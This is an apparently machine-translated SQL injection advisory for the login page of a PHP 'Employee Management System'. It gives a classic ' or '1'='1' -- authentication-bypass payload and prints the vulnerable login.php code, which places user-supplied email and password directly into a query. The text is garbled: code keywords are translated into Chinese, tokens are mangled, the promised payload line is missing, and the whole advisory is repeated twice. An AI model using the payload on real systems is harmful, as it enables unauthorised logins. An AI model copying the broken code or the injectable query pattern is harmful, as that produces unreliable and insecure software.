#利用标题:员工管理系统V1-“电子邮件” SQL注入
#Google Dork: N/A
#Application:员工管理系统
#日期: 19.02.2024
#BUGS: SQL注入
#利用作者: Sospiro
#供应商homepage3360 https://www.sourcecodester.com/
#软件link: https://www.sourcecodester.com/php/16999/employee-management-system.html
#版本: N/A。
#测试在: Windows 10 64位Wampserver
#CVE : N/A
##漏洞描述:
在您的代码中,由于直接将用户提供的数据纳入用于用户登录的SQL查询,因此存在潜在的SQL注入漏洞。这种情况增加了SQL注入攻击的风险,恶意用户可能会输入不适当的数据以可能损害您的数据库或窃取敏感信息。
##概念证明(POC):
示例攻击者可以将以下内容输入到电子邮件字段中,而不是有效的电子邮件地址:
在这种情况下,SQL查询看起来像:
从emaim='''或'1'='1' - '和password=''和status='active'的用户中选择* *
由于'1=1'始终是正确的,因此查询将返回积极的结果,从而允许攻击者登录。
##弱势代码部分:
==========================================================================
员工/admin/login.php
php
session_start();
error_reporting(1);
包括('./connect.php');
//获取网站详细信息
$ sql_website='select * from toble_setting';
$ result_website=$ conn-Query($ sql_website);
$ row_website=mysqli_fetch_array($ result_website);
if(isset($ _ post ['btnlogin'])){
//获取日期
date_default_timezone_set('非洲/拉各斯);
$ current_date=date('Y-M-D H:I:S');
$ email=$ _post ['txtemail'];
$ password=$ _post ['txtPassword'];
$ status='Active';
$ sql='select *从email=''。$ email的用户中。 ''和password='。$ password。'''和status='。$ status。'';
$ result=mysqli_query($ conn,$ sql);
if(mysqli_num_rows($ result)0){
//每行输出数据
($ row=mysqli_fetch_assoc($ result));
$ _session ['email']=$ row ['email'];
$ _session ['password']=$ row ['password'];
$ _session ['phone']=$ row ['phone'];
$ firstName=$ row ['firstName'];
$ _session ['firstName']=$ row ['firstName'];
$ fa=$ row ['2fa'];
}
#Google Dork: N/A
#Application:员工管理系统
#日期: 19.02.2024
#BUGS: SQL注入
#利用作者: Sospiro
#供应商homepage3360 https://www.sourcecodester.com/
#软件link: https://www.sourcecodester.com/php/16999/employee-management-system.html
#版本: N/A。
#测试在: Windows 10 64位Wampserver
#CVE : N/A
##漏洞描述:
在您的代码中,由于直接将用户提供的数据纳入用于用户登录的SQL查询,因此存在潜在的SQL注入漏洞。这种情况增加了SQL注入攻击的风险,恶意用户可能会输入不适当的数据以可能损害您的数据库或窃取敏感信息。
##概念证明(POC):
示例攻击者可以将以下内容输入到电子邮件字段中,而不是有效的电子邮件地址:
在这种情况下,SQL查询看起来像:
从emaim='''或'1'='1' - '和password=''和status='active'的用户中选择* *
由于'1=1'始终是正确的,因此查询将返回积极的结果,从而允许攻击者登录。
##弱势代码部分:
==========================================================================
员工/admin/login.php
php
session_start();
error_reporting(1);
包括('./connect.php');
//获取网站详细信息
$ sql_website='select * from toble_setting';
$ result_website=$ conn-Query($ sql_website);
$ row_website=mysqli_fetch_array($ result_website);
if(isset($ _ post ['btnlogin'])){
//获取日期
date_default_timezone_set('非洲/拉各斯);
$ current_date=date('Y-M-D H:I:S');
$ email=$ _post ['txtemail'];
$ password=$ _post ['txtPassword'];
$ status='Active';
$ sql='select *从email=''。$ email的用户中。 ''和password='。$ password。'''和status='。$ status。'';
$ result=mysqli_query($ conn,$ sql);
if(mysqli_num_rows($ result)0){
//每行输出数据
($ row=mysqli_fetch_assoc($ result));
$ _session ['email']=$ row ['email'];
$ _session ['password']=$ row ['password'];
$ _session ['phone']=$ row ['phone'];
$ firstName=$ row ['firstName'];
$ _session ['firstName']=$ row ['firstName'];
$ fa=$ row ['2fa'];
}